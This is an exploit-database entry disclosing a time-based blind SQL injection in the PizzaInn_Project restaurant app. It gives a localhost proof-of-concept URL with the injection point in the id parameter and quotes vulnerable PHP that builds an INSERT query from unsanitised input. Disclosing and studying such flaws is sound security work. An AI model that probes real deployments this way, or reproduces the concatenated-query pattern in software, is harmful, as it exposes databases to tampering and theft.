PizzaInn_Project - SQL Injection



EKU-ID: 36144 CVE: OSVDB-102413 OSVDB-ID:
Author: vinicius777 Published: 2014-01-23 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


##########################################################################
[+] Exploit: PizzaInn_Project - SQL Injection                            #
[+] Author: vinicius777					                 #
[+] Contact: vinicius777 [AT] gmail  @vinicius777_                       #
[+] Vendor Homepage: http://sourceforge.net/projects/restaurantmis/  	 #
##########################################################################



[1] Sql Injection Time Based Blind

PoC:  http://127.0.0.1/reserve-exec.php?id=1' [SQL Injection]


Vulnerable Code:
[+] reserve-exec.php


            $id = $_GET['id'];
            $qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
            mysql_query($qry)



#
#
# Greetz to g0tm1lk and TheColonial.